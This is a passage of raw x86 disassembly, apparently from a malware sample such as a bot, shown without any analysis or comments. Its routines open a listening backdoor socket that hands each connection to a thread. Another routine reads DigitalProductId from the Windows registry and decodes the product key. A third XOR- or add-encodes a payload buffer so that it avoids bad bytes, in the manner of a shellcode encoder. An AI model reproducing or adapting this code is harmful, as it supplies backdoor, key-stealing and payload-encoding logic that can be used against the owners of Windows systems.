		call	sub_408130
		add	esp, 0Ch
		push	ebx
		push	8
		lea	eax, [esp+53Ch+var_404]
		push	eax
		push	esi
		call	ds:dword_41E228	; send
		jmp	short loc_414785
; ---------------------------------------------------------------------------

loc_41475A:				; CODE XREF: sub_41463A+FAj
		mov	[esp+540h+var_403], 5Ah
		call	sub_408130
		add	esp, 0Ch
		push	ebx
		push	8
		lea	eax, [esp+53Ch+var_404]
		push	eax
		push	esi
		call	ds:dword_41E228	; send
		push	esi
		push	edi
		call	sub_41452B
		pop	ecx
		pop	ecx

loc_414785:				; CODE XREF: sub_41463A+4Fj
					; sub_41463A+6Cj ...
		push	esi
		call	ds:dword_41E280	; closesocket
		call	ds:dword_41E0DC	; GetCurrentThreadId
		push	eax
		call	sub_414CA5
		pop	ecx
		mov	ecx, [esp+540h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	4
sub_41463A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4147B2	proc near		; DATA XREF: sub_401EF9+139o

var_130		= byte ptr -130h
var_24		= byte ptr -24h
var_23		= byte ptr -23h
var_14		= dword	ptr -14h
var_C		= byte ptr -0Ch
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_10		= byte ptr  18h
arg_20		= byte ptr  28h
arg_120		= dword	ptr  128h
arg_12C		= byte ptr  134h
arg_13C		= dword	ptr  144h
arg_144		= dword	ptr  14Ch
arg_14C		= dword	ptr  154h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		push	0FFFFFFFFh
		push	offset loc_41CE81
		mov	eax, large fs:0
		push	eax
		sub	esp, 14Ch
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+158h+var_14], eax
		push	esi
		push	edi
		mov	eax, dword_424064
		xor	eax, esp
		push	eax
		lea	eax, [esp+164h+var_C]
		mov	large fs:0, eax
		mov	esi, [ebp+arg_0]
		mov	[esp+164h+var_24], 0
		xor	eax, eax
		lea	edi, [esp+164h+var_23]
		stosd
		stosd
		stosd
		push	41h
		pop	ecx
		stosw
		push	6
		stosb
		push	1
		lea	edi, [esp+16Ch+var_130]
		push	2
		rep movsd
		call	ds:dword_41E220	; socket
		push	[esp+0Ch+arg_120]
		mov	dword_428E48, eax
		mov	word ptr [esp+10h+arg_0], 2
		call	ds:dword_41E270	; htons
		and	[esp+0Ch+arg_4], 0
		mov	word ptr [esp+0Ch+arg_0+2], ax
		push	10h
		lea	eax, [esp+10h+arg_0]
		push	eax
		push	dword_428E48
		call	ds:dword_41E27C	; bind
		test	eax, eax
		jge	short loc_414861
		push	offset aS4BindError ; "S4: bind() Error"
		jmp	short loc_414878
; ---------------------------------------------------------------------------

loc_414861:				; CODE XREF: sub_4147B2+A6j
		push	0Ah
		push	dword_428E48
		call	ds:dword_41E230	; listen
		test	eax, eax
		jge	short loc_4148C5
		push	offset aS4ListenError ;	"S4: listen() Error"

loc_414878:				; CODE XREF: sub_4147B2+ADj
		lea	eax, [esp+10h+arg_20]
		push	eax
		push	[esp+14h+arg_120+2]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 10h
		call	ds:dword_41E0DC	; GetCurrentThreadId
		push	eax
		call	sub_414CA5
		pop	ecx
		xor	eax, eax
		mov	ecx, [esp+0Ch+arg_144]
		mov	large fs:0, ecx
		pop	ecx
		pop	edi
		pop	esi
		mov	ecx, [esp+arg_13C]
		xor	ecx, esp
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	4
; ---------------------------------------------------------------------------

loc_4148C5:				; CODE XREF: sub_4147B2+BFj
		push	dword_428D1C
		lea	esi, [esp+10h+arg_12C]
		call	sub_419C46
		movsx	eax, word ptr [esp+10h+arg_120]
		pop	ecx
		push	eax
		mov	eax, esi
		push	eax
		push	offset aS4SI	; "S4: %s:%i"
		lea	eax, [esp+18h+arg_20]
		push	eax
		push	[esp+1Ch+arg_120+2]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 18h
		xor	eax, eax
		mov	edi, esi
		stosd
		stosd
		stosd
		stosd

loc_41490A:				; CODE XREF: sub_4147B2+1A0j
		push	0
		lea	eax, [esp+10h+arg_10]
		push	eax
		push	dword_428E48
		call	ds:dword_41E234	; accept
		push	8
		mov	edi, eax
		call	sub_4035D9
		mov	esi, eax
		pop	ecx
		mov	[esp+10h], esi
		and	[esp+0Ch+arg_14C], 0
		test	esi, esi
		jz	short loc_41494A
		mov	ecx, edi
		push	offset sub_41463A
		mov	edi, offset aSc	; "SC"
		call	sub_414D0E

loc_41494A:				; CODE XREF: sub_4147B2+185j
		or	[esp+0Ch+arg_14C], 0FFFFFFFFh
		jmp	short loc_41490A
sub_4147B2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=10Ch


sub_414954	proc near		; CODE XREF: sub_401E90+38p

var_18C		= dword	ptr -18Ch
var_188		= dword	ptr -188h
var_184		= dword	ptr -184h
var_180		= dword	ptr -180h
var_17C		= dword	ptr -17Ch
var_178		= dword	ptr -178h
var_174		= dword	ptr -174h
var_170		= dword	ptr -170h
var_16C		= dword	ptr -16Ch
var_168		= dword	ptr -168h
var_164		= dword	ptr -164h
var_160		= dword	ptr -160h
var_15C		= dword	ptr -15Ch
var_158		= dword	ptr -158h
var_154		= dword	ptr -154h
var_150		= dword	ptr -150h
var_14C		= dword	ptr -14Ch
var_148		= dword	ptr -148h
var_144		= dword	ptr -144h
var_140		= dword	ptr -140h
var_13C		= dword	ptr -13Ch
var_138		= dword	ptr -138h
var_134		= dword	ptr -134h
var_130		= dword	ptr -130h
var_12C		= dword	ptr -12Ch
var_128		= dword	ptr -128h
var_124		= dword	ptr -124h
var_120		= dword	ptr -120h
var_11C		= dword	ptr -11Ch
var_118		= dword	ptr -118h
var_114		= byte ptr -114h
var_113		= byte ptr -113h
var_14		= byte ptr -14h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		lea	ebp, [esp-10Ch]
		sub	esp, 18Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+10Ch+var_4], eax
		mov	eax, [ebp+10Ch+arg_0]
		push	ebx
		push	esi
		xor	ebx, ebx
		push	0FFh
		mov	[ebp+10Ch+var_128], eax
		lea	eax, [ebp+10Ch+var_113]
		push	ebx
		push	eax
		mov	[ebp+10Ch+var_114], bl
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [ebp+10Ch+var_11C]
		push	eax
		push	0F003Fh
		push	ebx
		push	offset aSoftwareMicros ; "SOFTWARE\\MICROSOFT\\Windows NT\\CurrentVe"...
		push	80000002h
		mov	[ebp+10Ch+var_18C], offset aB_0	; "B"
		mov	[ebp+10Ch+var_188], offset aC_0	; "C"
		mov	[ebp+10Ch+var_184], offset aD_0	; "D"
		mov	[ebp+10Ch+var_180], offset aF ;	"F"
		mov	[ebp+10Ch+var_17C], offset aG ;	"G"
		mov	[ebp+10Ch+var_178], offset asc_420770 ;	"H"
		mov	[ebp+10Ch+var_174], offset aJ ;	"J"
		mov	[ebp+10Ch+var_170], offset aK ;	"K"
		mov	[ebp+10Ch+var_16C], offset aM ;	"M"
		mov	[ebp+10Ch+var_168], offset aP ;	"P"
		mov	[ebp+10Ch+var_164], offset aQ ;	"Q"
		mov	[ebp+10Ch+var_160], offset aR ;	"R"
		mov	[ebp+10Ch+var_15C], offset aT ;	"T"
		mov	[ebp+10Ch+var_158], offset aV ;	"V"
		mov	[ebp+10Ch+var_154], offset aW_0	; "W"
		mov	[ebp+10Ch+var_150], offset asc_420798 ;	"X"
		mov	[ebp+10Ch+var_14C], offset aY ;	"Y"
		mov	[ebp+10Ch+var_148], offset a2 ;	"2"
		mov	[ebp+10Ch+var_144], offset a3 ;	"3"
		mov	[ebp+10Ch+var_140], offset a4 ;	"4"
		mov	[ebp+10Ch+var_13C], offset a6 ;	"6"
		mov	[ebp+10Ch+var_138], offset a7 ;	"7"
		mov	[ebp+10Ch+var_134], offset a8 ;	"8"
		mov	[ebp+10Ch+var_130], offset a9 ;	"9"
		mov	[ebp+10Ch+var_12C], ebx
		call	ds:off_41E02C
		test	eax, eax
		jnz	loc_414BBA
		mov	eax, 0A4h
		push	eax
		mov	[ebp+10Ch+var_124], eax
		call	sub_403C6E
		mov	esi, eax
		cmp	esi, ebx
		pop	ecx
		mov	[ebp+10Ch+var_120], esi
		jz	loc_414BBD
		push	[ebp+10Ch+var_124]
		push	ebx
		push	esi
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [ebp+10Ch+var_124]
		push	eax
		push	esi
		push	ebx
		push	ebx
		push	offset aDigitalproduct ; "DigitalProductId"
		push	[ebp+10Ch+var_11C]
		call	ds:off_41E008
		test	eax, eax
		jnz	loc_414BBD
		push	edi
		add	esi, 34h
		lea	edi, [ebp+10Ch+var_14]
		movsd
		movsd
		movsd
		movsw
		lea	eax, [ebp+10Ch+var_14]
		movsb
		lea	ecx, [eax+1]

loc_414ABD:				; CODE XREF: sub_414954+16Ej
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_414ABD
		sub	eax, ecx
		mov	[ebp+eax+10Ch+var_14], bl
		mov	[ebp+10Ch+var_118], 18h

loc_414AD4:				; CODE XREF: sub_414954+21Ej
		push	0Eh
		xor	edi, edi
		pop	esi

loc_414AD9:				; CODE XREF: sub_414954+1A1j
		lea	ecx, [ebp+esi+10Ch+var_14]
		movzx	edx, byte ptr [ecx]
		mov	eax, edi
		shl	eax, 8
		xor	eax, edx
		push	18h
		cdq
		pop	edi
		idiv	edi
		dec	esi
		mov	[ecx], al
		mov	edi, edx
		jns	short loc_414AD9
		lea	eax, [ebp+10Ch+var_114]
		push	eax
		call	sub_404330
		mov	eax, [ebp+edi*4+10Ch+var_18C]
		pop	ecx
		mov	edx, eax

loc_414B07:				; CODE XREF: sub_414954+1B8j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_414B07
		lea	edi, [ebp+10Ch+var_114]
		sub	eax, edx
		dec	edi

loc_414B14:				; CODE XREF: sub_414954+1C6j
		mov	cl, [edi+1]
		inc	edi
		cmp	cl, bl
		jnz	short loc_414B14
		mov	ecx, eax
		shr	ecx, 2
		mov	esi, edx
		rep movsd
		mov	ecx, eax
		lea	eax, [ebp+10Ch+var_114]
		and	ecx, 3
		push	eax
		rep movsb
		call	sub_404330
		mov	eax, [ebp+10Ch+var_118]
		pop	ecx
		push	5
		cdq
		pop	ecx
		idiv	ecx
		test	edx, edx
		jnz	short loc_414B6F
		cmp	[ebp+10Ch+var_118], ebx
		jz	short loc_414B6F
		lea	eax, [ebp+10Ch+var_114]
		push	eax
		call	sub_404330
		lea	edi, [ebp+10Ch+var_114]
		pop	ecx
		dec	edi

loc_414B56:				; CODE XREF: sub_414954+208j
		mov	al, [edi+1]
		inc	edi
		cmp	al, bl
		jnz	short loc_414B56
		lea	eax, [ebp+10Ch+var_114]
		mov	esi, offset asc_420800 ; "-"
		push	eax
		movsw
		call	sub_404330
		pop	ecx

loc_414B6F:				; CODE XREF: sub_414954+1EDj
					; sub_414954+1F2j
		dec	[ebp+10Ch+var_118]
		jns	loc_414AD4
		mov	esi, [ebp+10Ch+var_128]
		lea	eax, [ebp+10Ch+var_114]
		push	eax
		push	offset aS	; "%s"
		push	0FFh
		push	esi
		call	sub_40307C
		add	esp, 10h
		mov	eax, esi
		lea	ecx, [eax+1]
		pop	edi

loc_414B98:				; CODE XREF: sub_414954+249j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_414B98
		push	[ebp+10Ch+var_11C]
		sub	eax, ecx
		mov	[eax+esi], bl
		call	ds:off_41E010
		push	[ebp+10Ch+var_120]
		call	sub_403B91
		pop	ecx
		mov	eax, esi
		jmp	short loc_414BD3
; ---------------------------------------------------------------------------

loc_414BBA:				; CODE XREF: sub_414954+104j
		mov	esi, [ebp+10Ch+var_120]

loc_414BBD:				; CODE XREF: sub_414954+120j
					; sub_414954+14Aj
		push	[ebp+10Ch+var_11C]
		call	ds:off_41E010
		cmp	esi, ebx
		jz	short loc_414BD1
		push	esi
		call	sub_403B91
		pop	ecx

loc_414BD1:				; CODE XREF: sub_414954+274j
		xor	eax, eax

loc_414BD3:				; CODE XREF: sub_414954+264j
		mov	ecx, [ebp+10Ch+var_4]
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 10Ch
		leave
		retn
sub_414954	endp

; ---------------------------------------------------------------------------
		cmp	dword ptr [eax+4], 0
		setnz	al
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_414BF2	proc near		; CODE XREF: sub_414C86+12p
					; sub_414CA5+5Dp

var_18		= byte ptr -18h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		and	dword ptr [ebx+4], 0
		mov	eax, dword_43768C
		mov	eax, [eax]
		mov	[ebp+var_4], eax
		mov	eax, offset dword_437688
		push	esi
		push	edi
		mov	[ebp+var_8], eax
		mov	[ebp+var_10], eax

loc_414C13:				; CODE XREF: sub_414BF2+4Cj
		mov	eax, dword_43768C
		lea	edi, [ebp+var_10]
		lea	esi, [ebp+var_8]
		mov	[ebp+var_C], eax
		call	sub_40169D
		test	al, al
		jz	short loc_414C7B
		call	sub_40164F
		mov	ecx, [ebx]
		cmp	ecx, [eax+40h]
		lea	edi, [ebp+var_18]
		jz	short loc_414C40
		call	sub_40166F
		jmp	short loc_414C13
; ---------------------------------------------------------------------------

loc_414C40:				; CODE XREF: sub_414BF2+45j
		mov	eax, [ebp+var_8]
		mov	[ebp+var_10], eax
		mov	eax, [ebp+var_4]
		lea	esi, [ebp+var_10]
		mov	[ebp+var_C], eax
		call	sub_40166F
		mov	eax, [eax+4]
		cmp	eax, dword_43768C
		jz	short loc_414C7B
		mov	ecx, [eax+4]
		mov	edx, [eax]
		mov	[ecx], edx
		mov	ecx, [eax]
		mov	edx, [eax+4]
		push	eax
		mov	[ecx+4], edx
		call	sub_4034FB
		dec	dword_437690
		pop	ecx

loc_414C7B:				; CODE XREF: sub_414BF2+36j
					; sub_414BF2+6Bj
		push	ebx
		call	sub_4034FB
		pop	ecx
		pop	edi
		pop	esi
		leave
		retn
sub_414BF2	endp


; =============== S U B	R O U T	I N E =======================================



sub_414C86	proc near		; CODE XREF: sub_402086+77p
					; .text:00402A3Ep ...
		push	ebx
		mov	ebx, eax
		push	0
		push	dword ptr [ebx+4]
		call	ds:off_41E094
		test	eax, eax
		jz	short loc_414CA1
		call	sub_414BF2
		mov	al, 1
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_414CA1:				; CODE XREF: sub_414C86+10j
		xor	al, al
		pop	ebx
		retn
sub_414C86	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_414CA5	proc near		; CODE XREF: sub_41463A+159p
					; sub_4147B2+E6p ...

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= byte ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 1Ch
		mov	eax, dword_43768C
		mov	eax, [eax]
		push	ebx
		mov	[esp+20h+var_14], eax
		mov	eax, offset dword_437688
		push	esi
		push	edi
		mov	[esp+28h+var_18], eax
		mov	[esp+28h+var_10], eax

loc_414CC9:				; CODE XREF: sub_414CA5+54j
		mov	eax, dword_43768C
		lea	edi, [esp+28h+var_10]
		lea	esi, [esp+28h+var_18]
		mov	[esp+28h+var_C], eax
		call	sub_40169D
		test	al, al
		jz	short loc_414D07
		call	sub_40164F
		mov	ecx, [ebp+arg_0]
		cmp	ecx, [eax+40h]
		jz	short loc_414CFB
		lea	edi, [esp+28h+var_8]
		call	sub_40166F
		jmp	short loc_414CC9
; ---------------------------------------------------------------------------

loc_414CFB:				; CODE XREF: sub_414CA5+49j
		call	sub_40164F
		mov	ebx, [eax]
		call	sub_414BF2

loc_414D07:				; CODE XREF: sub_414CA5+3Cj
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		retn
sub_414CA5	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_414D0E	proc near		; CODE XREF: sub_40177B+246p
					; sub_4019F3+1F8p ...

var_50		= dword	ptr -50h
var_4C		= byte ptr -4Ch
var_4B		= byte ptr -4Bh
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 54h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	esi
		push	0
		push	ecx
		push	eax
		push	0
		push	0
		call	ds:off_41E090
		test	eax, eax
		mov	[esi+4], eax
		jz	short loc_414D67
		push	edi
		lea	eax, [ebp+var_4B]
		push	38h
		push	eax
		call	sub_40307C
		mov	eax, [esi]
		add	esp, 0Ch
		mov	[ebp+var_10], eax
		mov	eax, dword_43768C
		push	eax
		mov	ecx, offset dword_437688
		push	ecx
		lea	eax, [ebp+var_50]
		push	eax
		mov	[ebp+var_4C], 0
		mov	[ebp+var_50], esi
		call	sub_4016BA

loc_414D67:				; CODE XREF: sub_414D0E+27j
		push	1
		push	dword ptr [esi+4]
		call	ds:off_41E07C
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		mov	eax, esi
		call	sub_402C9E
		leave
		retn	4
sub_414D0E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_414D82	proc near		; CODE XREF: sub_41B423+42Ap
					; sub_41B423+438p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_2		= byte ptr -2
var_1		= byte ptr -1
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		cmp	[ebp+arg_0], 1
		push	ebx
		push	esi
		push	edi
		mov	[ebp+var_2], 1
		mov	[ebp+var_1], 0
		jnz	loc_414EA8
		mov	eax, [ebp+arg_4]
		lea	ecx, [eax+18h]
		and	eax, 80000001h
		mov	[ebp+arg_0], ecx
		jns	short loc_414DB2
		dec	eax
		or	eax, 0FFFFFFFEh
		inc	eax

loc_414DB2:				; CODE XREF: sub_414D82+29j
		jz	short loc_414DB8
		mov	[ebp+var_1], 1

loc_414DB8:				; CODE XREF: sub_414D82:loc_414DB2j
		mov	eax, 172h
		cmp	ecx, eax
		jle	short loc_414DCB
		cmp	[ebp+var_1], 1
		jnz	loc_414F9C

loc_414DCB:				; CODE XREF: sub_414D82+3Dj
		inc	ecx
		cmp	ecx, eax
		mov	[ebp+var_C], ecx
		jle	short loc_414DDD
		cmp	[ebp+var_1], 1
		jz	loc_414F9C

loc_414DDD:				; CODE XREF: sub_414D82+4Fj
		mov	ebx, offset byte_437508
		jmp	short loc_414DE9
; ---------------------------------------------------------------------------

loc_414DE4:				; CODE XREF: sub_414D82+F7j
		mov	eax, 172h

loc_414DE9:				; CODE XREF: sub_414D82+60j
		inc	[ebp+var_2]
		and	[ebp+var_8], 0
		push	eax
		push	0
		push	ebx
		call	sub_408130
		add	esp, 0Ch
		push	6
		pop	ecx
		mov	esi, offset dword_426A80
		mov	edi, ebx
		rep movsd
		mov	cl, [ebp+var_2]
		xor	edi, edi
		cmp	[ebp+arg_4], edi
		mov	byte_437516, cl
		mov	byte_43751A, cl
		jle	short loc_414E38

loc_414E1E:				; CODE XREF: sub_414D82+B4j
		mov	esi, [ebp+var_8]
		mov	al, byte_437390[esi]
		add	al, cl
		mov	byte_437520[esi], al
		inc	esi
		cmp	esi, [ebp+arg_4]
		mov	[ebp+var_8], esi
		jl	short loc_414E1E

loc_414E38:				; CODE XREF: sub_414D82+9Aj
		cmp	[ebp+var_1], 1
		jnz	short loc_414E47
		mov	eax, [ebp+var_8]
		mov	byte_437520[eax], cl

loc_414E47:				; CODE XREF: sub_414D82+BAj
		cmp	[ebp+arg_0], edi
		mov	al, 1
		jle	short loc_414E84

loc_414E4E:				; CODE XREF: sub_414D82+EEj
		mov	dl, byte_437508[edi]
		xor	esi, esi

loc_414E56:				; CODE XREF: sub_414D82+E0j
		cmp	dl, byte_4267F4[esi]
		jz	short loc_414E66
		inc	esi
		cmp	esi, 8
		jl	short loc_414E56
		jmp	short loc_414E68
; ---------------------------------------------------------------------------

loc_414E66:				; CODE XREF: sub_414D82+DAj
		xor	al, al

loc_414E68:				; CODE XREF: sub_414D82+E2j
		test	al, al
		jz	short loc_414E72
		inc	edi
		cmp	edi, [ebp+arg_0]
		jl	short loc_414E4E

loc_414E72:				; CODE XREF: sub_414D82+E8j
		cmp	al, 1
		jz	short loc_414E84
		cmp	cl, 0FFh
		jb	loc_414DE4
		jmp	loc_414F9C
; ---------------------------------------------------------------------------

loc_414E84:				; CODE XREF: sub_414D82+CAj
					; sub_414D82+F2j ...
		cmp	[ebp+var_1], 1
		jnz	short loc_414E93
		mov	eax, [ebp+var_C]
		inc	[ebp+arg_4]
		mov	[ebp+arg_0], eax

loc_414E93:				; CODE XREF: sub_414D82+106j
		mov	eax, [ebp+arg_4]
		cdq
		sub	eax, edx
		sar	eax, 1
		mov	byte_43750B, al
		mov	eax, [ebp+arg_0]
		jmp	loc_414F9E
; ---------------------------------------------------------------------------

loc_414EA8:				; CODE XREF: sub_414D82+15j
		cmp	[ebp+arg_0], 2
		jnz	loc_414F9C
		mov	eax, [ebp+arg_4]
		lea	ecx, [eax+18h]
		and	eax, 80000001h
		mov	[ebp+arg_0], ecx
		jns	short loc_414EC7
		dec	eax
		or	eax, 0FFFFFFFEh
		inc	eax

loc_414EC7:				; CODE XREF: sub_414D82+13Ej
		jz	short loc_414ECD
		mov	[ebp+var_1], 1

loc_414ECD:				; CODE XREF: sub_414D82:loc_414EC7j
		mov	eax, 172h
		cmp	ecx, eax
		jle	short loc_414EE0
		cmp	[ebp+var_1], 1
		jnz	loc_414F9C

loc_414EE0:				; CODE XREF: sub_414D82+152j
		inc	ecx
		cmp	ecx, eax
		mov	[ebp+var_C], ecx
		jle	short loc_414EF2
		cmp	[ebp+var_1], 1
		jz	loc_414F9C

loc_414EF2:				; CODE XREF: sub_414D82+164j
		mov	ebx, offset byte_437508
		jmp	short loc_414EFE
; ---------------------------------------------------------------------------

loc_414EF9:				; CODE XREF: sub_414D82+214j
		mov	eax, 172h

loc_414EFE:				; CODE XREF: sub_414D82+175j
		inc	[ebp+var_2]
		and	[ebp+var_8], 0
		push	eax
		push	0
		push	ebx
		call	sub_408130
		add	esp, 0Ch
		push	6
		pop	ecx
		mov	esi, offset dword_426A9C
		mov	edi, ebx
		rep movsd
		mov	cl, [ebp+var_2]
		xor	edi, edi
		cmp	[ebp+arg_4], edi
		mov	byte_437516, cl
		mov	byte_43751A, cl
		jle	short loc_414F4D

loc_414F33:				; CODE XREF: sub_414D82+1C9j
		mov	esi, [ebp+var_8]
		mov	al, byte_437390[esi]
		xor	al, cl
		mov	byte_437520[esi], al
		inc	esi
		cmp	esi, [ebp+arg_4]
		mov	[ebp+var_8], esi
		jl	short loc_414F33

loc_414F4D:				; CODE XREF: sub_414D82+1AFj
		cmp	[ebp+var_1], 1
		jnz	short loc_414F5C
		mov	eax, [ebp+var_8]
		mov	byte_437520[eax], cl

loc_414F5C:				; CODE XREF: sub_414D82+1CFj
		cmp	[ebp+arg_0], edi
		mov	al, 1
		jle	loc_414E84

loc_414F67:				; CODE XREF: sub_414D82+207j
		mov	dl, byte_437508[edi]
		xor	esi, esi

loc_414F6F:				; CODE XREF: sub_414D82+1F9j
		cmp	dl, byte_4267F4[esi]
		jz	short loc_414F7F
		inc	esi
		cmp	esi, 8
		jl	short loc_414F6F
		jmp	short loc_414F81
; ---------------------------------------------------------------------------

loc_414F7F:				; CODE XREF: sub_414D82+1F3j
		xor	al, al

loc_414F81:				; CODE XREF: sub_414D82+1FBj
		test	al, al
		jz	short loc_414F8B
		inc	edi
		cmp	edi, [ebp+arg_0]
		jl	short loc_414F67

loc_414F8B:				; CODE XREF: sub_414D82+201j
		cmp	al, 1
		jz	loc_414E84
		cmp	cl, 0FFh
		jb	loc_414EF9

loc_414F9C:				; CODE XREF: sub_414D82+43j
					; sub_414D82+55j ...
		xor	eax, eax

loc_414F9E:				; CODE XREF: sub_414D82+121j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_414D82	endp


; =============== S U B	R O U T	I N E =======================================



sub_414FA3	proc near		; CODE XREF: sub_41B423+417p

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		mov	ebp, [esp+8+arg_0]
		mov	eax, ebp
		lea	edx, [eax+1]

loc_414FAE:				; CODE XREF: sub_414FA3+10j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414FAE
		sub	eax, edx
		lea	ebx, [eax+0CCh]
		cmp	ebx, 172h
		jg	short loc_41500C
		push	esi
		push	edi
		push	ebx
		push	0
		push	offset byte_437390
		call	sub_408130
		add	esp, 0Ch
		push	32h
		pop	ecx
		mov	esi, offset dword_426AB8
		mov	edi, offset byte_437390
		rep movsd
		movsw
		mov	eax, ebp
		movsb
		lea	esi, [eax+1]

loc_414FEE:				; CODE XREF: sub_414FA3+50j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414FEE
		sub	eax, esi
		push	eax
		push	ebp
		push	offset word_43745A
		call	sub_4081B0
		add	esp, 0Ch
		pop	edi
		mov	eax, ebx
		pop	esi
		jmp	short loc_41500E
; ---------------------------------------------------------------------------

loc_41500C:				; CODE XREF: sub_414FA3+20j
		xor	eax, eax

loc_41500E:				; CODE XREF: sub_414FA3+67j
		pop	ebp
		pop	ebx
		retn
sub_414FA3	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_415020	proc near		; CODE XREF: sub_41C1B3+64p
		xor	ecx, ecx
		push	esi
		push	edi
		mov	[eax+8], ecx
		mov	[eax+0Ch], ecx
		mov	[eax], ecx
		mov	[eax+4], ecx
		lea	edi, [eax+10h]
		mov	ecx, 10h
		mov	esi, offset byte_420FF8
		rep movsd
		pop	edi
		pop	esi
		retn
sub_415020	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_415050	proc near		; CODE XREF: sub_417760+BEp
					; sub_417760+13Bp ...

var_160		= dword	ptr -160h
var_15C		= dword	ptr -15Ch
var_158		= dword	ptr -158h
var_154		= dword	ptr -154h
var_150		= dword	ptr -150h
var_14C		= dword	ptr -14Ch
var_148		= dword	ptr -148h
var_144		= dword	ptr -144h
var_140		= dword	ptr -140h
var_13C		= dword	ptr -13Ch
var_138		= dword	ptr -138h
var_134		= dword	ptr -134h
var_130		= dword	ptr -130h
var_12C		= dword	ptr -12Ch
var_128		= dword	ptr -128h
var_124		= dword	ptr -124h
var_120		= dword	ptr -120h
var_11C		= dword	ptr -11Ch
var_118		= dword	ptr -118h
var_114		= dword	ptr -114h
var_110		= dword	ptr -110h
var_10C		= dword	ptr -10Ch
var_108		= dword	ptr -108h
var_104		= dword	ptr -104h
var_100		= dword	ptr -100h
var_FC		= dword	ptr -0FCh
var_F8		= dword	ptr -0F8h
var_F4		= dword	ptr -0F4h
var_F0		= dword	ptr -0F0h
var_EC		= dword	ptr -0ECh
var_E8		= dword	ptr -0E8h
var_E4		= dword	ptr -0E4h
var_E0		= dword	ptr -0E0h
var_DC		= dword	ptr -0DCh
var_D8		= dword	ptr -0D8h
var_D4		= dword	ptr -0D4h
var_D0		= dword	ptr -0D0h
var_CC		= dword	ptr -0CCh
var_C8		= dword	ptr -0C8h
var_C4		= dword	ptr -0C4h
var_C0		= dword	ptr -0C0h
var_BC		= dword	ptr -0BCh
var_B8		= dword	ptr -0B8h
var_B4		= dword	ptr -0B4h
var_B0		= dword	ptr -0B0h
var_AC		= dword	ptr -0ACh
var_A8		= dword	ptr -0A8h
var_A4		= dword	ptr -0A4h
var_A0		= dword	ptr -0A0h
var_9C		= dword	ptr -9Ch
var_98		= dword	ptr -98h
var_94		= dword	ptr -94h
var_90		= dword	ptr -90h
var_8C		= dword	ptr -8Ch
var_88		= dword	ptr -88h
var_84		= dword	ptr -84h
var_80		= dword	ptr -80h
var_7C		= dword	ptr -7Ch
var_78		= dword	ptr -78h
var_74		= dword	ptr -74h
var_70		= dword	ptr -70h
var_6C		= dword	ptr -6Ch
var_68		= dword	ptr -68h
var_64		= dword	ptr -64h
var_60		= dword	ptr -60h
var_5C		= dword	ptr -5Ch
var_58		= dword	ptr -58h
var_54		= dword	ptr -54h
var_50		= dword	ptr -50h
var_4C		= dword	ptr -4Ch
var_48		= dword	ptr -48h
var_44		= dword	ptr -44h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

		sub	esp, 160h
		mov	eax, [esp+160h+arg_0]
		mov	edx, [eax+54h]
		push	ebx
		mov	[esp+164h+var_FC], edx
		mov	edx, [eax+5Ch]
		push	ebp
		push	esi
		mov	[esp+16Ch+var_10C], edx
		mov	edx, [eax+64h]
		push	edi
		lea	esi, [eax+10h]
